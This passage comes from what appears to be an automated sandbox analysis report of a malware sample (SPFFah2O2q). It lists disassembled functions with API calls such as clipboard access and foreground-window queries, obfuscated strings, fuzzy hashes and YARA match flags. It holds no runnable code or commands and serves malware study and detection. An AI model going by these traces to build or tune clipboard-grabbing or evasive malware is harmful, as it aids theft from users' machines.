                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2AF1CAB56083509FD3108F65E88276BBBF2FBD2345F54892DF0858B390D7B88906CB86
                                                                                                                                                                                                                                                                Function 00419F30 Relevance: 12.2, APIs: 2, Strings: 4, Instructions: 1664COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 0043C1F0: LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0041A6BD
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0041A77B
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                                                                                                                • String ID: / $/,-$Wu$46
                                                                                                                                                                                                                                                                • API String ID: 764372645-3330591033
                                                                                                                                                                                                                                                                • Opcode ID: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
                                                                                                                                                                                                                                                                • Instruction ID: fba97bcbe2fd55ed4e85c885b06b17ae8f82464d9f69d288493d133838553020
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9EB247766493009FE3208BA5D8847ABBBD2EBC5310F18D42EE9D497311D7789C858B9B
                                                                                                                                                                                                                                                                Function 0041CB40 Relevance: 10.7, Strings: 8, Instructions: 658COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 0u4w$KT$Q$SV$_q$p8`;$qr$xy
                                                                                                                                                                                                                                                                • API String ID: 0-1826372655
                                                                                                                                                                                                                                                                • Opcode ID: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
                                                                                                                                                                                                                                                                • Instruction ID: 8fe2ea29b4499c84cffcf606e05d59b8c59937f8b413fb95e2f4cb334fca5623
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C92212B690C3109BD304DF59D8816ABB7E2EFD5314F09892DE8C98B351E739C905CB8A
                                                                                                                                                                                                                                                                Function 0210A197 Relevance: 10.4, APIs: 2, Strings: 3, Instructions: 1664COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                                                • String ID: / $/,-$46
                                                                                                                                                                                                                                                                • API String ID: 3664257935-479303636
                                                                                                                                                                                                                                                                • Opcode ID: 372519780fc120e8f753ff3a14c90593fc4e495d40ae975e42710550ded1acc0
                                                                                                                                                                                                                                                                • Instruction ID: c04063689c9e0e3c8195488aa58e878306a25e5018eacb1abeca154e0fd30aee
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 372519780fc120e8f753ff3a14c90593fc4e495d40ae975e42710550ded1acc0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27B267766883409FE3208B95D8C4B7FBBE3ABC5304F1CC42DE6D49B291D7B599458B82
                                                                                                                                                                                                                                                                Function 0040A780 Relevance: 9.2, Strings: 7, Instructions: 442COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 1]_$:;$}JsE$}JsE$AC$E)G$Q?S
                                                                                                                                                                                                                                                                • API String ID: 0-2463461626
                                                                                                                                                                                                                                                                • Opcode ID: 80c25fe3e2dfb50a6448c8159146231cdcc410b8e27bdf8e1fa965ce3e3910ee
                                                                                                                                                                                                                                                                • Instruction ID: 1dd51b58cbaf6b0a0f55c15d87e18128fba8370b8dc8b23ccf2a832bc891c079
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80c25fe3e2dfb50a6448c8159146231cdcc410b8e27bdf8e1fa965ce3e3910ee
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29D1497665C3548BD324CF2488516ABBBE2EBC1304F1D897EE4D69B381D638C916CB87
                                                                                                                                                                                                                                                                Function 020FA9E7 Relevance: 9.2, Strings: 7, Instructions: 442COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 1]_$:;$}JsE$}JsE$AC$E)G$Q?S
                                                                                                                                                                                                                                                                • API String ID: 0-2463461626
                                                                                                                                                                                                                                                                • Opcode ID: 682ddf53b01bc525795b072e2938ffae95751b7f3a8718d374d2731849975a8c
                                                                                                                                                                                                                                                                • Instruction ID: 08ded7fadf2984c9239f50149bbaa213a5be55d2105bb5abc7ba080155b14994
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 682ddf53b01bc525795b072e2938ffae95751b7f3a8718d374d2731849975a8c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40D1497268C3548BC365CF24C8516ABBBE2ABC1308F1D896DE5DA8B741D739C509DB82
                                                                                                                                                                                                                                                                Function 004329C0 Relevance: 9.1, APIs: 6, Instructions: 144clipboardCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1006321803-0
                                                                                                                                                                                                                                                                • Opcode ID: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                                                                                                                                                                                                                                                • Instruction ID: f2decc6a1db23371b8bb2cc1877cdad688787675f84f74fde2292b1bd35bf902
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 855102F1D08A828FD700AF78C54936EFFA0AB15310F04863ED89597392D3BCA9598797
                                                                                                                                                                                                                                                                Function 00408F50 Relevance: 9.0, Strings: 7, Instructions: 223COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
                                                                                                                                                                                                                                                                • API String ID: 0-2309992716
                                                                                                                                                                                                                                                                • Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                                                                                                                                                                                • Instruction ID: 26eceaee55227743b306782b87e7b3b011f3ad886b5b359efa5fd428808e0ec2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F661F37164D3C68AD3118F3988A076BFFE09FA3310F18497EE4D05B382D7798A09975A
                                                                                                                                                                                                                                                                Function 020F91B7 Relevance: 9.0, Strings: 7, Instructions: 223COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
                                                                                                                                                                                                                                                                • API String ID: 0-2309992716
                                                                                                                                                                                                                                                                • Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                                                                                                                                                                                • Instruction ID: a7b1eef5a6b1c245ffab8ca2cb0362c25ded32e739c28f295cb6cae52d0c6043
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7461476168C3CA8AD3528F3988A076AFFE0DF93204F18496DE4D14B782D379C60DE716
                                                                                                                                                                                                                                                                Function 020F97E7 Relevance: 7.9, Strings: 6, Instructions: 442COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: #4<7$+8=>$PK$Tiec$\$r
                                                                                                                                                                                                                                                                • API String ID: 0-1906979145
                                                                                                                                                                                                                                                                • Opcode ID: eb9bb64c8f79c1854ab48af47ab7cc54b735788ac4fdc3cb149e9e4095002922
                                                                                                                                                                                                                                                                • Instruction ID: 0276b3c80838692bea6cd060c6c8b834ed69fe73052146a73dd4a6e0b20dc47d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eb9bb64c8f79c1854ab48af47ab7cc54b735788ac4fdc3cb149e9e4095002922
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CAD13376A483448BD318CF25C8916ABBBE2EFC1318F18892DE5E68B650D738C905CB46
                                                                                                                                                                                                                                                                Function 020F8AB7 Relevance: 7.7, APIs: 5, Instructions: 194threadCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 020F8B83
                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 020F8B8C
                                                                                                                                                                                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 020F8C42
                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 020F8C9A
                                                                                                                                                                                                                                                                  • Part of subcall function 020FC7B7: CoInitializeEx.COMBASE(00000000,00000002), ref: 020FC7CA
                                                                                                                                                                                                                                                                  • Part of subcall function 020FB5F7: FreeLibrary.KERNEL32(020F8D1F), ref: 020FB5FD
                                                                                                                                                                                                                                                                  • Part of subcall function 020FB5F7: FreeLibrary.KERNEL32 ref: 020FB61E
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 020F8D38
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3072701918-0
                                                                                                                                                                                                                                                                • Opcode ID: a98a3e3c2a5f1b0f673359f816fa1806a79807cb3814a0bc3f2413038ab882b7
                                                                                                                                                                                                                                                                • Instruction ID: 550726f10ae5b8be2442dca0c4b28ed1d570ac5b582bee2d953d8fbead30dd87
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a98a3e3c2a5f1b0f673359f816fa1806a79807cb3814a0bc3f2413038ab882b7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F51B8B7F903180BD75CAEA9CC4A79975878BC5710F1EC13D4A40DB7D1EEB8880192C1
                                                                                                                                                                                                                                                                Function 00427603 Relevance: 7.0, Strings: 5, Instructions: 702COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: )G+I$+K M$B~B$|B$s0u
                                                                                                                                                                                                                                                                • API String ID: 0-2670551875
                                                                                                                                                                                                                                                                • Opcode ID: b0f283475cc496918f7695a9f64fd01b0ee276164c6e466a1bea6c055f4721cd
                                                                                                                                                                                                                                                                • Instruction ID: a4cd9e1bca78e5d66c5ba9b7c65c08060f0057a840f0996e05fe944024406416
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b0f283475cc496918f7695a9f64fd01b0ee276164c6e466a1bea6c055f4721cd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C321175A08350CFD714CF28E85072EBBE2BF8A314F194A7DE89957392D7349805CB9A
                                                                                                                                                                                                                                                                Function 0210CE63 Relevance: 6.5, Strings: 5, Instructions: 273COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: KT$Q$SV$p8`;$xy
                                                                                                                                                                                                                                                                • API String ID: 0-2575762000
                                                                                                                                                                                                                                                                • Opcode ID: 8208a9a5f85f4d31079f5f33de460df7d971af99579cab6366320c8ef0c9cde7
                                                                                                                                                                                                                                                                • Instruction ID: 3b7dbb0080983c64d0afedf1087b069b8568109c666cafaa17ec66de9aea0152
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8208a9a5f85f4d31079f5f33de460df7d971af99579cab6366320c8ef0c9cde7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A491FFB695C3549FD304DF56C88155FBBE2FFC5304F19896DE8C88B241EA358A098BC6
                                                                                                                                                                                                                                                                Function 0041E7C0 Relevance: 5.8, Strings: 4, Instructions: 779COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: "$-+$/$hI
                                                                                                                                                                                                                                                                • API String ID: 0-2772680581
                                                                                                                                                                                                                                                                • Opcode ID: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
                                                                                                                                                                                                                                                                • Instruction ID: 80b5f3405da4d7e7bc2228bbbe7299cc3933a4313a4431d55bf3dd64750ae482
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6442387850C3818FC725CF25C8506AFBBE1AF85314F044A6EE8D85B392D739D94ACB5A
                                                                                                                                                                                                                                                                Function 0210EA27 Relevance: 5.8, Strings: 4, Instructions: 779COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: "$-+$/$hI
                                                                                                                                                                                                                                                                • API String ID: 0-2772680581
                                                                                                                                                                                                                                                                • Opcode ID: baaf34aebe6e111159d882b3926c0eef9b01d4c2baae1dbce7045adb7806651d
                                                                                                                                                                                                                                                                • Instruction ID: 69eab17d462887fc1b1d2bc46861407332f066c656d8a290f74a8c393c1dfcb8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: baaf34aebe6e111159d882b3926c0eef9b01d4c2baae1dbce7045adb7806651d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7042377054C3818FC725CF25C880A6EBBE1AF91314F188A6CE8E55B3D2DB76D906CB52
                                                                                                                                                                                                                                                                Function 0210D230 Relevance: 5.3, Strings: 4, Instructions: 318COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 0u4w$_q$qr$xy
                                                                                                                                                                                                                                                                • API String ID: 0-1225007230
                                                                                                                                                                                                                                                                • Opcode ID: 0bc8e236467d41b4c844bc6f0c0f01b646d1471f34f8a440b90695bf15ccba6a
                                                                                                                                                                                                                                                                • Instruction ID: 29d75b96ad340c1db2b543b868fba93e6a55eeb62e6dc3ca35ca9c9b524122f4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0bc8e236467d41b4c844bc6f0c0f01b646d1471f34f8a440b90695bf15ccba6a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F9103B19483118BC718CF98D8D276BB7F1EF95324F08996CE8CA8B391E3B49505C756
                                                                                                                                                                                                                                                                Function 0042CA49 Relevance: 5.3, Strings: 4, Instructions: 302COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                                • API String ID: 0-909542228
                                                                                                                                                                                                                                                                • Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                                                                                                                                                                                                                                • Instruction ID: f210d87f6d5865ed1c617f00c3be5d3d578c02e4f21426ae5baa12ce733d6edf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C0919E71A1C3A08BE3358F3594517AFBBD2AFD3314F58896EC4C99B382C6794405CB96
                                                                                                                                                                                                                                                                Function 0211CCB0 Relevance: 5.3, Strings: 4, Instructions: 302COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                                • API String ID: 0-909542228
                                                                                                                                                                                                                                                                • Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                                                                                                                                                                                                                                • Instruction ID: fbb517b05a9b8848c00c41dde374d2e50801e3fb5a424da556ed578732c22c6a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92916971A8C3918BE3348B3984517ABBBD29FD3314F29896DC4D99B382CB754409CB93
                                                                                                                                                                                                                                                                Function 0042CB22 Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                                • API String ID: 0-909542228
                                                                                                                                                                                                                                                                • Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                                                                                                                                                                                                                • Instruction ID: ba8baf3debfb1281f5f3a9f4bb7f36b3e217b7d4f704efc08a24ef2861aa601e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA916D71A1C3A08BE3358F3594917AFBBD2AFD3314F58896DC4C94B382CA794405CB96
                                                                                                                                                                                                                                                                Function 0211CD89 Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                                • API String ID: 0-909542228
                                                                                                                                                                                                                                                                • Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                                                                                                                                                                                                                • Instruction ID: c1b0c4405b8c15786069570b4c0fe2bb62c27a621c6302b7aaf56f53fcf3363f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB916A71A8C3D18BE3348B3984517ABBBD29FD3214F29896DC4D99B682CB754409CB93
                                                                                                                                                                                                                                                                Function 0042CAD0 Relevance: 5.3, Strings: 4, Instructions: 295COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
